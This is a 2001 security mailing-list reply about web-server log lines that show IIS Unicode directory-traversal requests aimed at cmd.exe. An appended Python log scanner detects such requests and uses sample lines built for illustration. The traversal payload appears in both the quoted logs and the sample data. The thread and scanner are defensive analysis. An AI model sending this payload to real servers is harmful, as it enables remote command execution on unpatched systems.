
Re: [cobalt-security] Odd log code, Hack attempt?



Quoting Rodrigo Velasco <rvelasco@xxxxxxx>:

> Hi again,
> 
> I've found the following lines in my last log from my Cobalt4i. I don't
> really know if it means something important, but it looks to me like
> somebody was trying to use a sort of script on my server:
> 
> ns.mydomain.com 207.175.129.160 - - [07/Apr/2001:06:50:01 -0400] "GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 302 308 "-" "-"
> ns2.mydomain.com 207.175.129.160 - - [07/Apr/2001:06:50:01 -0400] "GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 302 308 "-" "-"
> www.customer.com 207.175.129.160 - - [07/Apr/2001:06:50:01 -0400] "GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 302 310 "-" "-"

> I'd appreciate it if any of you could tell me what it means and what
> I could do to avoid risk to my server.

This is an attempt to exploit a standard known vulnerability on Windows IIS 
servers.  Some script kiddie is trying to crack your box, but is too stupid to 
know the difference between IIS and Apache.

As long as you keep up with the security patches, you should be fine.  And of 
course, running Linux is a good way to avoid Windows NT attacks.  :-)

*********************************
        Paul Gillingwater
        Managing Director
 CSO Lanifex Unternehmensberatung 
 & Softwareentwicklung G.m.b.H.
      NEW BUSINESS CONCEPTS

E-mail:  paul@xxxxxxxxxxx
Mobile:  +43/699/1922 3085
Webhome: http://www.lanifex.com
Address: Praterstrasse 60/1/2 
         A-1020 Vienna, Austria
*********************************
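
A log-scanning check for the requests quoted above, as an added example that is not part of the original thread: it flags request targets that contain an overlong 2-byte UTF-8 sequence (the `%c0%af` in those lines decodes to bytes 0xC0 0xAF, an overlong encoding of `/`) or that reference `cmd.exe`, and reports the status code the server returned. The function names, the regular expression and the sample lines are constructed for illustration and assume the vhost-prefixed log format shown in the quoted message.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample lines in the vhost-prefixed format quoted above;
# hostnames are placeholders and addresses come from a documentation range.
SAMPLE_LOG = """\
www.example.com 192.0.2.10 - - [07/Apr/2001:06:50:01 -0400] "GET /scripts/..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 302 308 "-" "-"
www.example.com 192.0.2.11 - - [07/Apr/2001:06:51:12 -0400] "GET /index.html HTTP/1.0" 200 1042 "-" "Mozilla/4.0"
www.example.com 192.0.2.12 - - [07/Apr/2001:06:52:40 -0400] "GET /caf%c3%a9.html HTTP/1.0" 200 512 "-" "Mozilla/4.0"
"""

LINE_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def has_overlong_utf8(raw: bytes) -> bool:
    """True if raw holds a 2-byte UTF-8 sequence that encodes an ASCII char."""
    # Lead bytes 0xC0/0xC1 plus a continuation byte only encode code points
    # below 0x80; valid UTF-8 never contains them.
    return any(
        raw[i] in (0xC0, 0xC1) and 0x80 <= raw[i + 1] <= 0xBF
        for i in range(len(raw) - 1)
    )

def classify(line: str):
    """Return a finding dict for a suspicious request line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = unquote_to_bytes(m["target"])  # percent-decode without assuming UTF-8
    reasons = []
    if has_overlong_utf8(raw):
        reasons.append("overlong-utf8")
    if b"cmd.exe" in raw.lower():
        reasons.append("cmd.exe")
    if not reasons:
        return None
    return {"vhost": m["vhost"], "ip": m["ip"],
            "status": int(m["status"]), "reasons": reasons}

def scan(text: str):
    """Classify every line of a log and keep only the findings."""
    return [f for f in map(classify, text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```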